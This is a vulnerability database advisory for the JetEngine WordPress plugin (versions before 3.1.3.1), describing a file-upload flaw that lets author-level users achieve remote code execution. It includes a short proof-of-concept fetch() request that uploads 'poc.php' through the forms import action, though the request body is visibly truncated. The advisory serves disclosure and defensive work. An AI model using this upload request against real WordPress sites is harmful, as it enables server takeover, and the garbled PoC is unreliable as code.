Lucene search

K
wpvulndbLuke SymonsWPVDB-ID:2A81B6B1-2339-4889-9C28-1AF133DF8B65
HistoryMar 20, 2023 - 12:00 a.m.

JetEngine < 3.1.3.1 - Author+ Remote Code Execution

2023-03-2000:00:00
Luke Symons
wpscan.com
116
jetengine plugin
remote code execution
vulnerability
file upload

EPSS

0.002

Percentile

58.8%

The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.

PoC

fetch(“/wp-admin/admin.php?action=jet_engine_forms_import”, { “headers”: { “accept”: “text/html”, “content-type”: “multipart/form-data; boundary=----WebKitFormBoundary5hcKRhxO2OVXJm3s” }, “body”: "------WebKitFormBoundary5hcKRhxO2OVXJm3s\r\nContent-Disposition: form-data; name="form_file"; filename="poc.php"\r\nContent-Type: application/json\r\n\r\n response.text()).then((data) => console.log(data));

EPSS

0.002

Percentile

58.8%

Related for WPVDB-ID:2A81B6B1-2339-4889-9C28-1AF133DF8B65